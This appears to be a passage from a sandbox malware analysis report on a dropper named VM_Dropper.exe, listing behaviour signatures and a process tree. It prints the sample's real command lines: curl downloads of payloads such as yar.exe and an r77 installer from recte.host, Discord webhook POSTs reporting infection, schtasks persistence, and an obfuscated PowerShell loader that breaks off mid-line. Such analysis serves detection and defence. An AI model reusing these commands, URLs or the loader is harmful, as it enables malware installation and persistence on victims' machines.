Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A
N/A N/A C:\Users\Admin\penisballs.exe N/A
N/A N/A C:\Users\Admin\sachost.exe N/A
N/A N/A C:\Users\Admin\physics.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4284 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 5116 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 5116 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 5116 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4944 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4944 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4944 wrote to memory of 3784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\yar.exe
PID 4284 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\yar.exe
PID 4284 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\sachost.exe
PID 4284 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\sachost.exe
PID 4284 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4808 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4808 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4808 wrote to memory of 4120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\penisware.exe
PID 4284 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\penisware.exe
PID 4284 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 928 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 928 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 928 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\penisballs.exe
PID 4284 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\penisballs.exe
PID 4284 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 3208 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3208 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3208 wrote to memory of 3140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4284 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\physics.exe
PID 4284 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\physics.exe
PID 4284 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1540 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1540 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 5040 wrote to memory of 3788 N/A C:\Users\Admin\yar.exe C:\Windows\System32\schtasks.exe
PID 5040 wrote to memory of 3788 N/A C:\Users\Admin\yar.exe C:\Windows\System32\schtasks.exe
PID 2276 wrote to memory of 3052 N/A C:\Users\Admin\penisware.exe C:\Windows\System32\schtasks.exe
PID 2276 wrote to memory of 3052 N/A C:\Users\Admin\penisware.exe C:\Windows\System32\schtasks.exe
PID 4284 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\calc.exe
PID 4284 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Users\Admin\calc.exe
PID 4284 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2572 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2572 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7fffce9e2e98,0x7fffce9e2ea4,0x7fffce9e2eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3204 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:3

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe

"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\SysWOW64\curl.exe

curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe

C:\Users\Admin\yar.exe

"C:\Users\Admin\yar.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe

C:\Users\Admin\sachost.exe

"C:\Users\Admin\sachost.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Users\Admin\penisware.exe

"C:\Users\Admin\penisware.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\penisballs.exe

"C:\Users\Admin\penisballs.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe

C:\Users\Admin\physics.exe

"C:\Users\Admin\physics.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Users\Admin\AppData\Local\penisware.exe"

C:\Users\Admin\calc.exe

"C:\Users\Admin\calc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Users\Admin\install.exe

"C:\Users\Admin\install.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\SysWOW64\curl.exe

curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:khqieLPAGIkJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QaFcTjDysRIKOS,[Parameter(Position=1)][Type]$xFFbXpvOkk)$eDBimKkyPFB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+'c'+'te'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType('M'+'y'+''+'D'+''+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'S'+''+[Char](101)+''+[Char](97)+'l'+'e'+'d,'+[Char](65)+''+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+'s',[MulticastDelegate]);$eDBimKkyPFB.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+'e'+''+'c'+'ia'+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+'u'+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$QaFcTjDysRIKOS).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$eDBimKkyPFB.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+''+[Char](116)+'ual',$xFFbXpvOkk,$QaFcTjDysRIKOS).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+','+''+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+'ed');Write-Output $eDBimKkyPFB.CreateType();}$wWpwKdmduEOhy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+'.'+'W'+''+[Char](105)+''+'n'+''+'3'+'2'+'.'+''+[Char](85)+'n'+'s'+''+[Char](97)+'f'+'e'+'Na'+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$CEUggeEQTcKXxV=$wWpwKdmduEOhy.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GpCmNAlCOxgkGsQOJwR=khqieLPAGIkJ @([String])([IntPtr]);$nzNlFJJjmdIMbKrTNexeWA=khqieLPAGIkJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GBUTUkJFiAC=$wWpwKdmduEOhy.GetMethod('G'+[Char](101)+''+[Char](116)+'M'+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+[Char](101)+'l'+'3'+'2'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$FrowdEgXLCLTFX=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$GBUTUkJFiAC,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$oykFIuICiuCOVfliw=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$GBUTUkJFiAC,[Object]('Vi'+[Char](114)+''+'t'+'ua'+'l'+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+'c'+'t')));$tIBwnIt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FrowdEgXLCLTFX,$GpCmNAlCOxgkGsQOJwR).Invoke('am